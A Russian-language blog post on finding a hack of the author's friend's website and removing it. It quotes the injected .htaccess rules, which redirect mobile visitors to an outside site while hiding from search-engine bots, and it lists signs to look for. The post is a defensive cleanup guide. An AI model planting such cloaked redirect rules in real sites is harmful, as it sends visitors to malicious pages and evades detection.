Ваш сайт взломали! Как найти и устранить беду

Исследования

29 марта 2015

0 92

Привет, друзья. Сегодня один из сайтов моего друга взломали самым наглым образом...

Итак, что мы имеем?

В поиске Яндекса этому сайту стала приписываться вот такая надпись:
Сайт может угрожать безопасности вашего компьютера или мобильного устройства
При переходе на сайт ничего страшного не происходит. Это потому что вирус или скорее дор ориентирован на мобильные устройства и планшеты. И если зайти на сайт с какого нибудь смартфона, то вас перекинут на какой-то левый сайт, в данном случае, это сайт onlineg4.net.

Вот такой код залили злоумышленники в файлик .htaccess на хостинге:
RewriteCond   %{HTTP_USER_AGENT} (android | midp | j2me | symbian | series\ 60 | symbos | windows\ mobile | windows\ ce | ppc | smartphone | blackberry | mtk | bada | windows\ phone) [NC]

RewriteCond   %{HTTP_USER_AGENT} !(accoona | ia_archiver | antabot | ask\ jeeves | baidu | dcpbot | eltaindexer | feedfetcher | gamespy | gigabot | googlebot | gsa-crawler | grub-client | gulper | slurp | mihalism | msnbot | worldindexer | ooyyo | pagebull | scooter | w3c_validator | jigsaw | webalta | yahoofeedseeker | yahoo!\ slurp | mmcrawler | yandexbot | yandeximages | yandexvideo | yandexmedia | yandexblogs | yandexaddurl |
yandexfavicons | yandexdirect | yandexmetrika | yandexcatalog | yandexnews | yandeximageresizer)   [NC]

RewriteRule   (.*)   http://onlineg4.net/u/9024   [L,R=302]

Тут не сложно было догадаться и найти его, как правило такой вредоносный редирект ставят в начале файла. Его можно с легкостью удалить и писать в Яндекс о том, что теперь с сайтом все в порядке и его стоит исключить из черного списка.

Более того, хочу сказать, что если у вас или ваших посетителей будет установлен антивирус Касперского, то ваш сайт еще поместят в черный список баз Касперского. После очистки сайта стоит еще писать в тех.поддержку Касперского с просьбой удалить сайт из их черного списка, а то пользователи никогда не попадут на ваш сайт.

Вот такой вот случай произошел, скажу он не редкость и, как правило, его легко устранить. Достаточно элементарных знаний кода:
  • просматриваем файлик .htaccess, который лежит в корне вашего сайта;
  • ищем в нем, как правило в начале, домен какого-то левого сайта, к которому вы не имеете отношения;
  • ищем слова похожие на android | midp | j2me | symbian | series\ 60 | symbos | windows\ mobile | windows\ ce | ppc | smartphone | blackberry | mtk | bada | windows\ phone, то есть это с каких операционных систем люди будут перенаправляться на левый сайт;
  • ищем название ботов gamespy | gigabot | googlebot | gsa-crawler | grub-client | gulper | slurp | mihalism | msnbot | worldindexer | ooyyo | pagebull | scooter | w3c_validator | jigsaw | webalta | yahoofeedseeker | yahoo;
  • и самое последнее, ищем 302 редирект, потому что ставят именно его, не знаю с чем это связано, может они верят, что 302 редирект - это временный редирект.
Вот так можно выявить взлом сайта. Удачи и защищайте свои сайты от коварных злоумышленников.

Мнение автора является его собственностью и не претендует на истину в последней инстанции.